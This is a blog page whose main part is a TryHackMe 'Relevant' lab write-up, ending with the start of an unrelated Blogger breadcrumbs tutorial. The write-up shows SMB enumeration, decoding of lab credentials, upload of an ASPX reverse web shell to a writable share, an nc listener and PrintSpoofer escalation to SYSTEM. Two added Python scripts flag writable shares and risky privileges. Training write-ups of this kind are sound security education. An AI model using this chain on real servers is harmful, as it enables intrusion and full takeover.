
ABOUT US

Our development agency is committed to providing you the best service.

OUR TEAM

The awesome people behind our brand ... and their life motto.

  • Kumar Atul Jaiswal

    Ethical Hacker

    Hacking is a Speed of Innovation And Technology with Romance.

  • Kumar Atul Jaiswal

    CEO Of Hacking Truth

    Loopholes are every major Security, Just need to Understand it well.

  • Kumar Atul Jaiswal

    Web Developer

    Technology is the best way to Change Everything, like Mindset Goal.

OUR SKILLS

We pride ourselves with strong, flexible and top notch skills.

Marketing

Development 90%
Design 80%
Marketing 70%


ACHIEVEMENTS

We help our clients integrate, analyze, and use their data to improve their business.

150

GREAT PROJECTS

300

HAPPY CLIENTS

650

COFFEES DRUNK

1568

FACEBOOK LIKES


PORTFOLIO

We pride ourselves on bringing a fresh perspective and effective marketing to each project.

  • TryHackMe relevant penetration testing walkthrough

      


    We have been engaged in a black-box penetration test (the IP address may differ). Our goal is to read the user flag and root flag files on the machine. On some machines you will be required to exploit an abuse of write permission in the Samba service in order to read the flag.

    Some machines are exploitable instantly, but some might require exploiting other ones first. Enumerate every compromised machine to identify valuable information that will help you proceed further into the environment.

    If you are stuck on one of the machines, don't overthink and start pentesting another one.

    When you read the flag file, you can be sure that the machine was successfully compromised. But keep your eyes open - apart from the flag, other useful information may be present on the system.



    Pre-Engagement Briefing


    You have been assigned to a client that wants a penetration test conducted on an environment due to be released to production in seven days.


    Scope of Work


    The client requests that an engineer conducts an assessment of the provided virtual environment. The client has asked that minimal information be provided about the assessment, wanting the engagement conducted from the eyes of a malicious actor (black box penetration test).  The client has asked that you secure two flags (no location provided) as proof of exploitation:

        User.txt
        Root.txt




    Additionally, the client has provided the following scope allowances:


    # Any tools or techniques are permitted in this engagement, however we ask that you attempt manual exploitation first
    # Locate and note all vulnerabilities found
    # Submit the flags discovered to the dashboard
    # Only the IP address assigned to your machine is in scope
    # Find and report ALL vulnerabilities (yes, there is more than one path to root)

     

    Penetration Testing Methodology


    Reconnaissance

    # Nmap



    Enumeration

    # Smbclient
    # Smbmap



    Exploiting

    # Abuse of write permission in Samba service



    Privilege Escalation

    # Abuse of the SeImpersonatePrivilege permission on the system.



    Let's start. First of all we will perform reconnaissance on this machine (our target IP may differ from yours); let's scan it first with nmap.



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ sudo nmap -sC -sV 10.10.220.229
    Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-17 11:22 IST
    Nmap scan report for 10.10.220.229
    Host is up (0.35s latency).
    Not shown: 995 filtered tcp ports (no-response)
    PORT     STATE SERVICE       VERSION
    80/tcp   open  http          Microsoft IIS httpd 10.0
    |_http-server-header: Microsoft-IIS/10.0
    | http-methods: 
    |_  Potentially risky methods: TRACE
    |_http-title: IIS Windows Server
    135/tcp  open  msrpc         Microsoft Windows RPC
    139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
    445/tcp  open  microsoft-ds  Windows Server 2016 Standard Evaluation 14393 microsoft-ds
    3389/tcp open  ms-wbt-server Microsoft Terminal Services
    |_ssl-date: 2022-03-17T05:53:59+00:00; 0s from scanner time.
    | ssl-cert: Subject: commonName=Relevant
    | Not valid before: 2022-03-16T05:13:22
    |_Not valid after:  2022-09-15T05:13:22
    | rdp-ntlm-info: 
    |   Target_Name: RELEVANT
    |   NetBIOS_Domain_Name: RELEVANT
    |   NetBIOS_Computer_Name: RELEVANT
    |   DNS_Domain_Name: Relevant
    |   DNS_Computer_Name: Relevant
    |   Product_Version: 10.0.14393
    |_  System_Time: 2022-03-17T05:53:20+00:00
    Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
    
    Host script results:
    |_clock-skew: mean: 1h24m00s, deviation: 3h07m51s, median: 0s
    | smb2-time: 
    |   date: 2022-03-17T05:53:20
    |_  start_date: 2022-03-17T05:14:03
    | smb-security-mode: 
    |   account_used: guest
    |   authentication_level: user
    |   challenge_response: supported
    |_  message_signing: disabled (dangerous, but default)
    | smb2-security-mode: 
    |   3.1.1: 
    |_    Message signing enabled but not required
    | smb-os-discovery: 
    |   OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
    |   Computer name: Relevant
    |   NetBIOS computer name: RELEVANT\x00
    |   Workgroup: WORKGROUP\x00
    |_  System time: 2022-03-16T22:53:20-07:00
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 74.72 seconds
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ 
    
    
    
    
    
    
    
    
    

    Then we enumerate with enum4linux, but unfortunately we get nothing from it, so we keep trying.



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ enum4linux 10.10.220.229              
    Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Mar 17 10:47:18 2022
    
     ========================== 
    |    Target Information    |
     ========================== 
    Target ........... 10.10.220.229
    RID Range ........ 500-550,1000-1050
    Username ......... ''
    Password ......... ''
    Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
    
    
     ===================================================== 
    |    Enumerating Workgroup/Domain on 10.10.220.229    |
     ===================================================== 
    [E] Can't find workgroup/domain
    
    
     ============================================= 
    |    Nbtstat Information for 10.10.220.229    |
     ============================================= 
    Looking up status of 10.10.220.229
    No reply from 10.10.220.229
    
     ====================================== 
    |    Session Check on 10.10.220.229    |
     ====================================== 
    Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
    [E] Server doesn't allow session using username '', password ''.  Aborting remainder of tests.
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ 
    
    



    You can also enumerate SMB with nmap's smb-enum* scripts:

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ nmap -p 139,445 -Pn --script smb-enum* 10.10.220.229
    Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-17 12:31 IST
    Nmap scan report for 10.10.220.229
    Host is up (0.35s latency).
    
    PORT    STATE SERVICE
    139/tcp open  netbios-ssn
    445/tcp open  microsoft-ds
    
    Host script results:
    | smb-enum-shares: 
    |   account_used: guest
    |   \\10.10.220.229\ADMIN$: 
    |     Type: STYPE_DISKTREE_HIDDEN
    |     Comment: Remote Admin
    |     Anonymous access: <none>
    |     Current user access: <none>
    |   \\10.10.220.229\C$: 
    |     Type: STYPE_DISKTREE_HIDDEN
    |     Comment: Default share
    |     Anonymous access: <none>
    |     Current user access: <none>
    |   \\10.10.220.229\IPC$: 
    |     Type: STYPE_IPC_HIDDEN
    |     Comment: Remote IPC
    |     Anonymous access: <none>
    |     Current user access: READ/WRITE
    |   \\10.10.220.229\nt4wrksv: 
    |     Type: STYPE_DISKTREE
    |     Comment: 
    |     Anonymous access: <none>
    |_    Current user access: READ/WRITE
    | smb-enum-sessions: 
    |_  <nobody>
    
    Nmap done: 1 IP address (1 host up) scanned in 97.83 seconds
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ 
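    As an added example (not part of the original walkthrough), here is a small Python triage script that parses the smb-enum-shares block above and flags disk shares writable by the enumerating account; a guest-writable DISKTREE share is the condition the rest of this walkthrough depends on, and the first thing a share owner should fix. The sample text is the page's own nmap output embedded as a constant; nothing else is assumed.

```python
from dataclasses import dataclass

# Constructed sample: the smb-enum-shares block from the nmap run above,
# copied as a raw string (backslashes are literal).
NMAP_SMB_ENUM = r"""
| smb-enum-shares: 
|   account_used: guest
|   \\10.10.220.229\ADMIN$: 
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Remote Admin
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.220.229\C$: 
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Default share
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.220.229\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: Remote IPC
|     Anonymous access: <none>
|     Current user access: READ/WRITE
|   \\10.10.220.229\nt4wrksv: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Anonymous access: <none>
|_    Current user access: READ/WRITE
| smb-enum-sessions: 
|_  <nobody>
"""

# nmap field name -> attribute on Share
FIELDS = {
    "Type": "share_type",
    "Comment": "comment",
    "Anonymous access": "anonymous",
    "Current user access": "current_user",
}


@dataclass
class Share:
    name: str
    share_type: str = ""
    comment: str = ""
    anonymous: str = ""
    current_user: str = ""


def parse_smb_enum_shares(text):
    """Parse nmap's smb-enum-shares tree into (account_used, [Share, ...]).

    nmap indents script output two spaces per level after the '| ' / '|_'
    prefix: depth 0 is the script name, depth 1 holds account_used and one
    '\\\\host\\share:' line per share, depth 2 holds that share's fields.
    """
    account_used = None
    shares = []
    current = None
    in_shares = False
    for line in text.splitlines():
        if not line.startswith("|"):
            continue                        # nmap prose around the script tree
        body = line[2:]                     # strip '| ' or '|_'
        depth = (len(body) - len(body.lstrip(" "))) // 2
        content = body.strip()
        if depth == 0:                      # a script header such as 'smb-enum-shares:'
            in_shares = content.startswith("smb-enum-shares")
            current = None
            continue
        key, sep, value = content.partition(":")
        if not in_shares or not sep:
            continue
        key, value = key.strip(), value.strip()
        if depth == 1:
            current = None
            if key.startswith("\\\\"):      # '\\host\share' opens a share record
                current = Share(name=key.rsplit("\\", 1)[1])
                shares.append(current)
            elif key == "account_used":
                account_used = value
        elif depth == 2 and current is not None and key in FIELDS:
            setattr(current, FIELDS[key], value)
    return account_used, shares


def writable_disk_shares(text):
    """One finding per disk share the enumerating account can write to.

    IPC$ is skipped: READ/WRITE on the IPC pipe share is normal and offers no
    place to drop a file. A DISKTREE share writable by a guest or anonymous
    session is the misconfiguration the rest of the walkthrough relies on; the
    share owner's fix is to remove that write permission.
    """
    account, shares = parse_smb_enum_shares(text)
    return [
        f"{s.name}: account '{account}' has write access to a disk share"
        for s in shares
        if "IPC" not in s.share_type
        and ("WRITE" in s.current_user.upper() or "WRITE" in s.anonymous.upper())
    ]


if __name__ == "__main__":
    for finding in writable_disk_shares(NMAP_SMB_ENUM):
        print(finding)
```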
    
    
    






    Visiting the web service (port 80), we check the source code and robots.txt; it seems there is nothing useful.



    TryHackMe relevant penetration testing walkthrough


    Network share


    Let’s start with the network share. Listing the shares reveals the presence of nt4wrksv.


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$  smbclient -L //10.10.220.229
    Enter WORKGROUP\kali's password: 
    
        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        nt4wrksv        Disk      
    SMB1 disabled -- no workgroup available
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ 
    
    
    


    Connecting to this share reveals a password file:


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ sudo smbclient //10.10.220.229/nt4wrksv
    Enter WORKGROUP\root's password: 
    Try "help" to get a list of possible commands.
    smb: \> dir
      .                                   D        0  Sun Jul 26 03:16:04 2020
      ..                                  D        0  Sun Jul 26 03:16:04 2020
      passwords.txt                       A       98  Sat Jul 25 20:45:33 2020
    
                    7735807 blocks of size 4096. 4922488 blocks available
    smb: \> get passwords.txt
    getting file \passwords.txt of size 98 as passwords.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
    smb: \> #www.hackingtruth.org
    
    
    
    

     

    The file contains base64-encoded credentials. We decode the file and find the credentials.


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ ls
    content.txt  passwords.txt
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ cat passwords.txt
    [User Passwords - Encoded]
    Qm9iIC0gIVBAJCRXMHJEITEyMw==
    QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ 
    
    


    For decoding this you can use many methods (online, offline, via the terminal, etc.), but we will use the hURL tool. First install it, then you can use it.

     

     


     


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ sudo apt-get install hurl 
    
    Reading package lists... Done
    Building dependency tree... Done
    Reading state information... Done
    The following packages were automatically installed and are no longer required:
      libblkid-dev libglib2.0-dev-bin libmount-dev libpcre16-3 libpcre2-dev libpcre2-posix3 libpcre3-dev libpcre32-3 libpcrecpp0v5 libselinux1-dev libsepol-dev mypaint-brushes mypaint-data
      mypaint-data-extras uuid-dev
    Use 'sudo apt autoremove' to remove them.
    The following NEW packages will be installed:
      hurl
    0 upgraded, 1 newly installed, 0 to remove and 903 not upgraded.
    Need to get 19.5 kB of archives.
    After this operation, 191 kB of additional disk space will be used.
    Get:1 http://ftp.harukasan.org/kali kali-rolling/main amd64 hurl all 2.1-0kali2 [19.5 kB]
    Fetched 19.5 kB in 14s (1,432 B/s)
    Selecting previously unselected package hurl.
    (Reading database ... 431755 files and directories currently installed.)
    Preparing to unpack .../hurl_2.1-0kali2_all.deb ...
    Unpacking hurl (2.1-0kali2) ...
    Setting up hurl (2.1-0kali2) ...
    Processing triggers for kali-menu (2021.4.2) ...
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ hURL -b "Qm9iIC0gIVBAJCRXMHJEITEyMw=="
    
    Original string       :: Qm9iIC0gIVBAJCRXMHJEITEyMw==                                                                                                                                       
    base64 DEcoded string :: Bob - !P@$$W0rD!123
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ 
    
    
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ hURL -b "QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk"
    
    Original string       :: QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk                                                                                                                           
    base64 DEcoded string :: Bill - Juw4nnaM4n420696969!$$$
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ 
    
    
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ echo "Qm9iIC0gIVBAJCRXMHJEITEyMw==" | base64 -d            
    Bob - !P@$$W0rD!123
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ #www.kumaratuljaiswal.in    #www.hackingtruth.in
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ echo "QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk" | base64 -d
    Bill - Juw4nnaM4n420696969!$$$
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$                          
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ echo "QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk" | base64 -d;echo""
    Bill - Juw4nnaM4n420696969!$$$
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ echo "Qm9iIC0gIVBAJCRXMHJEITEyMw==" | base64 -d;echo""            
    Bob - !P@$$W0rD!123
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ 
    
    
    
    
    

    Now it is time to use smbmap with the credentials we found. We can see that we have write access to the share “nt4wrksv”.


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ smbmap -H 10.10.220.229 -u bob -p '!P@$$W0rD!123'
    [+] IP: 10.10.220.229:445       Name: 10.10.220.229                                     
            Disk                                                    Permissions     Comment
            ----                                                    -----------     -------
            ADMIN$                                                  NO ACCESS       Remote Admin
            C$                                                      NO ACCESS       Default share
            IPC$                                                    READ ONLY       Remote IPC
            nt4wrksv                                                READ, WRITE
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ 
    
    
    
    
    



     

     

     

    We test whether the share's directory can be reached through a different web service, and find that the contents of the SMB share are served by the web server running on port 49663.



    TryHackMe relevant penetration testing walkthrough



    Exploiting


    We upload “shell.aspx”, a webshell that lets us execute commands from the browser.


    But first, download shell.aspx:


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ sudo wget https://raw.githubusercontent.com/borjmz/aspx-reverse-shell/master/shell.aspx
    [sudo] password for hackerboy: 
    --2022-03-18 12:33:57--  https://raw.githubusercontent.com/borjmz/aspx-reverse-shell/master/shell.aspx
    Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 2606:50c0:8003::154, 2606:50c0:8000::154, 2606:50c0:8001::154, ...
    Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|2606:50c0:8003::154|:443... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 15968 (16K) [text/plain]
    Saving to: ‘shell.aspx’
    
    shell.aspx                                     100%[====================================================================================================>]  15.59K  --.-KB/s    in 0.002s  
    
    2022-03-18 12:34:04 (9.54 MB/s) - ‘shell.aspx.1’ saved [15968/15968]
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$
    
    
    



    After downloading shell.aspx, change the IP address and port number in it to your (attacker) machine's IP address and listening port.



    TryHackMe relevant penetration testing walkthrough



    Now we can upload this shell to the SMB share with this command:

    sudo smbclient //10.10.177.40/nt4wrksv -u bob -p


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ sudo smbclient //10.10.177.40/nt4wrksv -u bob -p
    Try "help" to get a list of possible commands.
    smb: \> dir
      .                                   D        0  Sun Jul 26 03:16:04 2020
      ..                                  D        0  Sun Jul 26 03:16:04 2020
      passwords.txt                       A       98  Sat Jul 25 20:45:33 2020
    
                    7735807 blocks of size 4096. 4951344 blocks available
    smb: \> put shell.aspx
    putting file shell.aspx as \shell.aspx (1.1 kb/s) (average 1.1 kb/s)
    smb: \> 
    



    Then we open this URL in the browser to trigger the reverse shell:


    10.10.162.140:49663/nt4wrksv/shell.aspx (this IP belongs to the vulnerable machine)

    and catch it with this listener in our terminal:

    nc -nvlp 4444


    After the reverse shell connects to your system, we look for the user flag. I searched every directory/file and finally found it, so I recommend you first find it yourself.


    User-flag


    TryHackMe relevant penetration testing walkthrough


    Privilege Escalation (NT AUTHORITY\SYSTEM) (Root Flag)

    We execute the command “whoami /priv” and see that we hold the “SeImpersonatePrivilege” privilege on the system.


    c:\Users\Bob\Desktop>whoami /priv           
    whoami /priv
    
    PRIVILEGES INFORMATION
    ----------------------
    
    Privilege Name                Description                               State   
    ============================= ========================================= ========
    SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
    SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
    SeAuditPrivilege              Generate security audits                  Disabled
    SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
    SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
    SeCreateGlobalPrivilege       Create global objects                     Enabled 
    SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
    
    c:\Users\Bob\Desktop> 
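    As an added example (not from the original walkthrough), a Python parser for the fixed-width `whoami /priv` table above that lists which held privileges allow token abuse, whether or not their State is Enabled: a process can enable any privilege its token holds, so Disabled is not a mitigation. The table text is the page's own output embedded as a constant; the risk list goes beyond the page's SeImpersonatePrivilege to the other token-level privileges that are commonly triaged the same way.

```python
import re
from dataclasses import dataclass

# Constructed sample input: the `whoami /priv` table from the walkthrough,
# as cmd.exe prints it (fixed-width columns under an '=' underline row).
WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Privileges that let their holder move into another security context.
# Enabled vs Disabled is irrelevant for triage: a process can enable any
# privilege present in its token. Service accounts such as IIS application
# pool identities hold SeImpersonatePrivilege by default, which is why a
# web shell running as one is enough to reach the technique shown here.
HIGH_RISK = {
    "SeImpersonatePrivilege": "impersonate any client that connects to the process",
    "SeAssignPrimaryTokenPrivilege": "start a process with an arbitrary primary token",
    "SeDebugPrivilege": "open and tamper with any process, including SYSTEM ones",
    "SeTcbPrivilege": "act as part of the operating system",
    "SeBackupPrivilege": "read any file regardless of its ACL",
    "SeRestorePrivilege": "write any file regardless of its ACL",
    "SeLoadDriverPrivilege": "load kernel-mode drivers",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
}


@dataclass
class Privilege:
    name: str
    description: str
    state: str

    @property
    def enabled(self):
        return self.state.lower() == "enabled"


def parse_whoami_priv(text):
    """Parse the fixed-width `whoami /priv` table into Privilege records.

    Column boundaries are read from the '=====' underline row, so the parser
    does not depend on the width of any particular description. Splitting on
    whitespace would not work: some rows separate columns by a single space.
    """
    lines = text.splitlines()
    for i, line in enumerate(lines):
        if line.startswith("=") and set(line.strip()) <= {"=", " "}:
            underline = i
            break
    else:
        raise ValueError("no column underline row found")
    spans = [m.span() for m in re.finditer(r"=+", lines[underline])]
    if len(spans) != 3:
        raise ValueError(f"expected 3 columns, found {len(spans)}")
    spans[-1] = (spans[-1][0], None)            # last column runs to end of line
    privs = []
    for line in lines[underline + 1:]:
        if not line.strip():
            break                               # blank line ends the table
        name, desc, state = (line[a:b].strip() for a, b in spans)
        privs.append(Privilege(name, desc, state))
    return privs


def high_risk_privileges(privs):
    """Held privileges that allow escalation, in table order, Enabled or not."""
    return [p for p in privs if p.name in HIGH_RISK]


if __name__ == "__main__":
    for p in high_risk_privileges(parse_whoami_priv(WHOAMI_PRIV)):
        print(f"{p.name:30} {p.state:9} {HIGH_RISK[p.name]}")
```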
     

     

     

    I started to Google the abuse of this privilege in Windows 2016, and I found this GitHub project that worked for me (after several attempts xD).

     


    PrintSpoofer


    To exploit this impersonation privilege, the standard potato exploit won’t work, and we’ll use a new tool called PrintSpoofer.


    First we download the PrintSpoofer.exe file, which we will use to gain administrator privileges on Windows...


    Then we upload PrintSpoofer.exe to the share:


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
    └─$ sudo smbclient //10.10.177.40/nt4wrksv -u bob -p
    Try "help" to get a list of possible commands.
    smb: \> dir
      .                                   D        0  Sun Jul 26 03:16:04 2020
      ..                                  D        0  Sun Jul 26 03:16:04 2020
      passwords.txt                       A       98  Sat Jul 25 20:45:33 2020
    
                    7735807 blocks of size 4096. 4951344 blocks available
    smb: \>
    smb: \> put PrintSpoofer.exe
    putting file PrintSpoofer.exe as \PrintSpoofer.exe (8.7 kb/s) (average 7.1 kb/s)
    smb: \> 
    smb: \> dir
      .                                   D        0  Fri Mar 18 12:52:00 2022
      ..                                  D        0  Fri Mar 18 12:52:00 2022
      passwords.txt                       A       98  Sat Jul 25 20:45:33 2020
      PrintSpoofer.exe                    A    27136  Fri Mar 18 12:52:02 2022
      shell.aspx                          A    15990  Fri Mar 18 12:38:30 2022
    
                    7735807 blocks of size 4096. 4946925 blocks available
    smb: \> 
    
    
    




    c:\inetpub\wwwroot\nt4wrksv>dir
    dir
     Volume in drive C has no label.
     Volume Serial Number is AC3C-5CB5
    
     Directory of c:\inetpub\wwwroot\nt4wrksv
    
    03/18/2022  12:22 AM    <DIR>          .
    03/18/2022  12:22 AM    <DIR>          ..
    07/25/2020  08:15 AM                98 passwords.txt
    03/18/2022  12:22 AM            27,136 PrintSpoofer.exe
    03/18/2022  12:08 AM            15,990 shell.aspx
                   3 File(s)         43,224 bytes
                   2 Dir(s)  20,228,485,120 bytes free
    
    c:\inetpub\wwwroot\nt4wrksv>PrintSpoofer -i -c cmd
    PrintSpoofer -i -c cmd
    [+] Found privilege: SeImpersonatePrivilege
    [+] Named pipe listening...
    [+] CreateProcessAsUser() OK
    Microsoft Windows [Version 10.0.14393]
    (c) 2016 Microsoft Corporation. All rights reserved.
    
    C:\Windows\system32>               
    
    
    
    
    



    Running PrintSpoofer with -i -c cmd gave us a SYSTEM shell; now let's find the root flag:


    Root Flag

    C:\Windows\system32>cd /
    cd /
    
    C:\>dir
    dir
     Volume in drive C has no label.
     Volume Serial Number is AC3C-5CB5
    
     Directory of C:\
    
    07/25/2020  08:16 AM    <DIR>           inetpub
    07/25/2020  08:42 AM    <DIR>           Microsoft
    07/16/2016  06:23 AM    <DIR>           PerfLogs
    07/25/2020  08:00 AM    <DIR>           Program Files
    07/25/2020  04:15 PM    <DIR>           Program Files (x86)
    07/25/2020  02:03 PM    <DIR>           Users
    07/25/2020  04:16 PM    <DIR>           Windows
                   0 File(s)              0 bytes
                   7 Dir(s)  20,228,354,048 bytes free
    
    C:\>cd Users
    cd Users
    
    C:\Users>dir
    dir
     Volume in drive C has no label.
     Volume Serial Number is AC3C-5CB5
    
     Directory of C:\Users
    
    07/25/2020  02:03 PM    <DIR>           .
    07/25/2020  02:03 PM    <DIR>           ..
    07/25/2020  08:05 AM    <DIR>           .NET v4.5
    07/25/2020  08:05 AM    <DIR>           .NET v4.5 Classic
    07/25/2020  10:30 AM    <DIR>           Administrator
    07/25/2020  02:03 PM    <DIR>           Bob
    07/25/2020  07:58 AM    <DIR>           Public
                   0 File(s)              0 bytes
                   7 Dir(s)  20,228,354,048 bytes free
    
    C:\Users>cd Administrator
    cd Administrator
    
    C:\Users\Administrator>dir
    dir
     Volume in drive C has no label.
     Volume Serial Number is AC3C-5CB5
    
     Directory of C:\Users\Administrator
    
    07/25/2020  10:30 AM    <DIR>           .
    07/25/2020  10:30 AM    <DIR>           ..
    07/25/2020  07:58 AM    <DIR>           Contacts
    07/25/2020  08:24 AM    <DIR>           Desktop
    07/25/2020  07:58 AM    <DIR>           Documents
    07/25/2020  08:39 AM    <DIR>           Downloads
    07/25/2020  07:58 AM    <DIR>           Favorites
    07/25/2020  07:58 AM    <DIR>           Links
    07/25/2020  07:58 AM    <DIR>           Music
    07/25/2020  07:58 AM    <DIR>           Pictures
    07/25/2020  07:58 AM    <DIR>           Saved Games
    07/25/2020  07:58 AM    <DIR>           Searches
    07/25/2020  07:58 AM    <DIR>           Videos
                   0 File(s)              0 bytes
                  13 Dir(s)  20,226,048,000 bytes free
    
    C:\Users\Administrator>cd Desktop
    cd Desktop
    
    C:\Users\Administrator\Desktop>dir
    dir
     Volume in drive C has no label.
     Volume Serial Number is AC3C-5CB5
    
     Directory of C:\Users\Administrator\Desktop
    
    07/25/2020  08:24 AM    <DIR>           .
    07/25/2020  08:24 AM    <DIR>           ..
    07/25/2020  08:25 AM                35 root.txt
                   1 File(s)             35 bytes
                   2 Dir(s)  20,224,438,272 bytes free
    
    C:\Users\Administrator\Desktop>type root.txt
    type root.txt
    THM{1fk5kf469devly1gl320zafgl345pv}
    C:\Users\Administrator\Desktop>
    
    C:\Users\Administrator\Desktop>hackingtruth.org 
    
    
    
    
    
    
    

    TryHackMe relevant penetration testing walkthrough


    Congratulations we got it :-)




    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.


  • Breadcrumbs Error fix on blogger

     



    Fix Breadcrumbs Error fix on blogger

     

    Guys, if you are new to Blogger or you have used a free Blogger template, then you must have come across the Breadcrumbs Error in Google Search Console. This problem was not seen before 2018, but since Google changed its algorithm, users of free Blogger templates have had to face the Breadcrumbs Error issue.

    You can fix the Breadcrumbs Error in Blogger very easily. For this you have to go to your theme and make a small change. Some people even tell you to add HTML code for it, but that method is not right; it is much easier to fix, and you do not have to paste any HTML code. Just make a small change and your Breadcrumbs Error problem will be fixed.





    What is Breadcrumbs Error?


    When we create a new blog on Blogger, we often do not have enough money to buy a premium Blogger template, so we use a free Blogger template from the internet on our blog. Because of this, an error named Breadcrumbs appears in our Google Search Console, which is called the Breadcrumbs Error or Breadcrumbs Issue.


    If you use a paid or premium Blogger template, then this problem is already fixed in those templates. If you have used a free template, then you have to fix it yourself, so let's learn how to fix the Blogger Breadcrumbs error or Breadcrumbs issue.





    How to fix breadcrumbs error?


